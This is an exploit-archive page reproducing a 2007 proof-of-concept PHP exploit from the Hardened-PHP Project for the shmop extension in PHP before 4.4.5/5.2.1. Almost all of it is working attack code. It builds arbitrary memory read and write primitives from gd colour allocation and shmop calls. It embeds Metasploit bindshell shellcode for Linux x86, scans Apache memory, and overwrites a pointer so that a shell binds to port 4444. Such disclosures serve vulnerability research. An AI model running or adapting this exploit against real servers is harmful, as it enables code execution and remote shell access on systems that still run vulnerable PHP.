PHP < 4.4.5 / 5.2.1 (shmop Functions) Local Code Execution Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP < 4.4.5 / 5.2.1 (shmop Functions) Local Code Execution Exploit
# Published : 2007-03-07
# Author : Stefan Esser
# Previous Title : PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit
# Next Title : PHP < 4.4.5 / 5.2.1 (shmop) SSL RSA Private-Key Disclosure Exploit

<?php
  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ | || || _  //
  // | __ |/ _` || '_|/ _` |/ -_)| '  / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|__,_||_|  __,_|___||_||_|___|__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //                PHP ext/shmop Code Execution Exploit                //
  ////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  if (!extension_loaded("gd") || !extension_loaded("shmop")) {
    die("This demonstration exploit only works with ext/gd and ext/shmop loaded.");
  }

  // This exploit contains a bindshell shellcode for linux x86 from metasploit
  // Therefore it only works with linux x86. It only works in PHP < 5.2.0 because
  // it searches for the shellcode by simply scanning the Apache memory
  // which is not possible with the new memory manager anymore
  
  $shellcode = "x29xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13x46".
      "x32x3cxe5x83xebxfcxe2xf4x77xe9x6fxa6x15x58x3ex8f".
      "x20x6axa5x6cxa7xffxbcx73x05x60x5ax8dx57x6ex5axb6".
      "xcfxd3x56x83x1ex62x6dxb3xcfxd3xf1x65xf6x54xedx06".
      "x8bxb2x6exb7x10x71xb5x04xf6x54xf1x65xd5x58x3exbc".
      "xf6x0dxf1x65x0fx4bxc5x55x4dx60x54xcax69x41x54x8d".
      "x69x50x55x8bxcfxd1x6exb6xcfxd3xf1x65";

  function init()
  {
    global $rid;
    
    $rid = imagecreate(10,10);
    imagecolorallocate($rid, 0, 0, 0);
    imagecolorallocate($rid, 0, 0, 0);
  }
  
  function peek($addr, $size)
  {
    global $rid;
    imagecolordeallocate($rid, 0);
    imagecolordeallocate($rid, 1);
    imagecolorallocate($rid, $addr, 0, 0);
    imagecolorallocate($rid, $size, 0, 0);
    return shmop_read((int)$rid, 0, $size);
  }
  
  function poke($addr, $val)
  {
    global $rid;
    imagecolordeallocate($rid, 0);
    imagecolordeallocate($rid, 1);
    imagecolorallocate($rid, $addr, 0, 0);
    imagecolorallocate($rid, strlen($val), 0, 0);
    return shmop_write((int)$rid, $val, 0);
  }

  init();
  
  $arr = array();
  for ($i=0; $i<129; $i++) { $arr[$i] = ""; }
  $arr[$shellcode] = 1;
  for ($i=0; $i<129; $i++) { unset($arr[$i]); }
  
  $offset = 0x08048000 + 1024 * 64;
  
  while (1) {
  
    $data = peek($offset, 1024 + 16);
    
    $position = strpos($data, "x00x01x00x00xffx00x00x00x01x00x00x00");
    if ($position !== false && $position < 1024) {
  
      $addr = unpack("L", peek($offset+$position+24, 4));
      $addr = $addr[1] + 32;
      $addr = pack("L", $addr);
      
      poke($offset+$position+32, $addr);
      
      echo "There should be a shell bound to port 4444 nownn";
      unset($arr);
      die();
    }
    $offset += 1024;
  }
?>

# www.Syue.com [2007-03-07]